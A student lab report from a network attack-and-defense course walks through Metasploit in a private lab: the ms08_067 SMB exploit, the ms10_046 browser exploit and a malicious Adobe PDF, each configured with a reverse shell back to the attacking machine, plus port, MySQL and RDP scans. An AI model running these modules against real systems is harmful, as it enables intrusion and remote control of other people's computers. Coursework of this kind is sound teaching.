2015306 白皎 《网络攻防》Exp5 MSF基础应用

2015306 白皎 《网络攻防》Exp5 MSF基础应用

一、基础问题

  • 用自己的话解释什么是exploit,payload,encode.
exploit指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,选择exploit模块的数量、源码,将真正要负责攻击的代码传送到靶机中。

payload也就是载荷,是目标系统在被渗透攻击之后去执行的代码,就像我们之前的shellcode。

encode进行编码,确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”,以及改变特征码,对攻击载荷进行“免杀”处理

二、实践内容

1.1一个主动攻击实践【ms08_067】

  • 启用msf终端
msfconsole
  • 使用search命令搜索该漏洞对应的模块,可以看到渗透攻击模块路径名为“exploit/windows/smb/ms08_067_netapi”
search ms08_067

  • 启用该渗透攻击模块来查看基本信息
use exploit/windows/smb/ms08_067_netapi

-查看该模块所适用的攻击载荷模块,之后选择其中一个

show payloads
  • 选择攻击载荷:
set payload generic/shell_reverse_tcp
  • 查看配置渗透攻击所需的配置项:
show options
  • 根据目标情况配置渗透攻击的各个选项,
set RHOST 192.168.241.130 //设置攻击Ip
set LPORT 5306//回连主机端口号
set LHOST 192.168.241.129//被攻击机ip
set target 5//目标系统类型为5

  • 查看设置后的选项设置的值是否正确

  • 发起渗透攻击
exploit

1.2 一个针对浏览器的攻击【ms10_046】

  • 使用search命令搜索该漏洞对应的模块,可以看到渗透攻击模块路径名
search ms11_050

  • 启用该渗透攻击模块来查看基本信息
use windows/browser/ms11_050_mshtml_cobjectelement

-查看该模块所适用的攻击载荷模块,之后选择其中一个

show payloads
  • 选择攻击载荷:
set payload generic/shell_reverse_tcp
  • 查看配置渗透攻击所需的配置项,根据目标情况配置渗透攻击的各个选项
show options

set SRVHOST 192.168.44.130 //本地监听主机的IP地址,即攻击Ip
set LPORT 5306//回连主机端口号
set LHOST 192.168.44.130//攻击机ip
set URIPATH 20155306
  • 查看设置后的选项设置的值是否正确

但是不知道为什么用ms11_050模块总是攻击不成功,换了好几种不同的xp都不行,所以下面用ms10_046来实现。

  • 一些搜索的步骤和之前一样,在这里就不再赘述。我们直接使用该模块:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
  • show payloads来查看我们可以使用的载荷,并选择一个使用

  • 通过show options查看需要设置的参数,进行设置后,再次用show options来检查
set SRVHOST 192.168.44.130 
set LPORT 5306
set LHOST 192.168.44.130
set URIPATH 20155306//选择性设置

  • 发起渗透攻击,可以看到生成了一个url
exploit

  • 在靶机的IE浏览器上使用该url进行访问,在MSF终端看见漏洞执行成功

  • 使用sessions
    指令查看当前存在的会话,然后使用sessions -i 1选择会话1,即可获取靶机信息,其ip是192.168.44.129是我的xp没错啦,然后用shell获取靶机的命令行

1.3 一个针对客户端的攻击【Adobe】

  • 使用search命令搜索该漏洞对应的模块,可以自己任意选择一个使用,
search adobe
use exploit/windows/fileformat/adobe_toolbutton

-查看载荷模块,并选择其中一个

show payloads
set payload generic/shell_reverse_tcp

  • 查看配置渗透攻击所需的配置项,修改配置后再进行检查
show options
set LPORT 5306//回连主机端口号
set LHOST 192.168.44.130//攻击机ip
set FILENAME 5306.pdf

  • 发起渗透攻击,可以看到/root/.msf4/local/下生成5306.pdf的文件
exploit

  • 然后使用监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.44.130
set LPORT 5306

  • 将pdf文件复制粘贴到xp靶机上,用adobe方式打开,可以看到成功获取靶机的shell啦

1.4 成功应用任何一个辅助模块【 scanner/mysql/mysql-version, scanner/portscan/syn,rdp/ms12_020check】

  • 使用search命令搜索辅助模块

1. scanner/mysql/mysql-version模块

  • 首先我选择的是 scanner/mysql/mysql-version

  • use scanner/mysql/mysql-version 应用该模块,然后通过通过show options查看需要设置的参数,设置好之后,便可以进行扫描,得到靶机数据库的版本。

2. scanner/portscan/syn模块

  • 同理,通过use scanner/portscan/syn 应用该模块,然后通过通过show options查看需要设置的参数

  • 检查参数设置无误之后,开始扫描,可以直观的看到靶机开放连接一些端口号

3. rdp/ms12_020check模块

  • auxiliary/scanner/rdp/ms12_020_check验证目标机是否具有此漏洞。具体步骤如下图所示:

  • 运行后显示关于漏洞是否可利用是不可靠的

三、 遇到的问题

问题一:配置好参数之后运行时,出现Hander failed to bind to192.168.44.128:56,为什么本机的ip,端口号都无法绑定?

解决:我尝试用ifconfig查看本机ip,发现查不到说明我的kali没有联网。打开/etc/network/interfaces,如下图增加最后两行。最后,在terminal里执行 /etc/init.d/networking restart 重启网络,使刚才的配置生效,done。详见教程:kali无法正常上网的解决过程

四、 实践总结与体会

本次实验感受到msf平台是很强大的,有特别多不同的模块,不同的功能来帮助我们去了解靶机信息。
但从另一方面讲,我们的windows也这样暴露在外面,可以被别人进行信息搜集和攻击,因此一定要经常杀杀毒,打好补丁!

posted on 2018-05-01 12:17  20155306  阅读(185)  评论(0编辑  收藏  举报

导航